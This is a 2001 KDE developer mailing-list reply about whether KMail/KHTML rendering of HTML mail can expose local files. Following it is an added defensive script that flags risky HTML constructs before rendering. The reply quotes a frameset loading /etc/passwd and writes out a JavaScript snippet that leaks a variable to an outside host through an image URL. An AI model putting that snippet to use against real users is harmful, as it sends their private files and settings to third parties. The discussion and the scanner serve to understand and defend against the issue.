List:       kfm-devel
Subject:    Re: Possible security problem in KHTML or KMail?
From:       Vadim Plessky <lucy-ples () mtu-net ! ru>
Date:       2001-10-11 13:59:54

On Thursday 11 October 2001 11:58, Rob Kaper wrote:
|   On Wed, Oct 10, 2001 at 09:14:59PM +0200, Ingo Klöcker wrote:
|   > <html><head></head><frameset><frame src="/etc/passwd"></frameset>
|   > <body></body></html>
|
|   This is by no means a security risk. Local users have always been able to
|   read/display the /etc/passwd file.

That's right.
But what if some JavaScript code parsed this /etc/passwd and sent it to another 
web site?

Let's assume the password (or other private info) is already in the "mypasw" 
variable.
This fragment of JS:
<script language="JavaScript"><!--
d=document;
d.write('<img src="http://your.web.page.com/counter'+
'?id=111;t=81;pas='+mypasw+';rand='+Math.random()+
'" alt="ha ha" '+ 'border=0 height=31 width=38>')
// -->
</script>
will effectively send "mypasw" to the http://your.web.page.com/ site (you just 
need to track incoming requests on the server, parse them, and store them 
later in a database).

Frankly speaking, I am not a Linux security expert, and don't know how 
confidential the information in /etc/passwd is.
It just has some user names, but no passwords.
Of course, in this manner you can steal all KDE settings (from ~/.kde), but I 
don't know if it is some kind of risk at all.

P.S. I agree with Ingo Klöcker: "The only security problem is allowing
HTML messages to be rendered at all." If you disable JavaScript and do not 
render HTML at all, you should feel secure.
-- 

Vadim Plessky
http://kde2.newmail.ru  (English)
33 Window Decorations and 6 Widget Styles for KDE
http://kde2.newmail.ru/kde_themes.html
KDE mini-Themes
http://kde2.newmail.ru/themes/
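
An added example, not part of the original message and not KMail or KHTML code: a pre-render check a mail client could run on an HTML part, flagging the constructs discussed in this thread (a frame pointing at a local file, script, and an automatic remote image fetch). The function names, the sample message and the collector.example.invalid host are assumptions made for illustration.

```javascript
// Added example: triage an HTML mail part before deciding whether to render it.
// Regex tag scanning is a heuristic; a real client should use its HTML parser.
const AUTOLOAD_ATTRS = ['src', 'background']; // fetched without user action

function classifyUrl(value) {
  const v = value.trim().toLowerCase();
  if (/^(https?:)?\/\//.test(v)) return 'remote-load'; // request leaves the machine
  if (v.startsWith('file:') || v.startsWith('/') || v.startsWith('~')) {
    return 'local-file'; // e.g. frame src="/etc/passwd"
  }
  return null; // cid:, data: and relative references are not flagged here
}

function scanMailHtml(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  for (const tag of html.matchAll(tagRe)) {
    const name = tag[1].toLowerCase();
    if (name === 'script') findings.push({ kind: 'script', tag: name, value: '' });
    for (const a of tag[2].matchAll(attrRe)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (attr.startsWith('on')) {
        findings.push({ kind: 'event-handler', tag: name, value: attr });
      } else if (AUTOLOAD_ATTRS.includes(attr)) {
        const kind = classifyUrl(value);
        if (kind) findings.push({ kind, tag: name, value });
      }
    }
  }
  return findings;
}

// Render as HTML only when nothing was flagged; otherwise show the plain-text part.
function safeToRender(html) {
  return scanMailHtml(html).length === 0;
}

// Constructed sample: the frameset quoted in the thread plus script, a remote image
// and an inline handler.
const SAMPLE = [
  '<html><head></head><frameset><frame src="/etc/passwd"></frameset>',
  '<body><script language="JavaScript">var x = 1;</script>',
  '<img src="http://collector.example.invalid/counter?id=111" height=31 width=38>',
  '<p onclick="void 0">hello</p></body></html>',
].join('\n');

console.log(scanMailHtml(SAMPLE));
```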
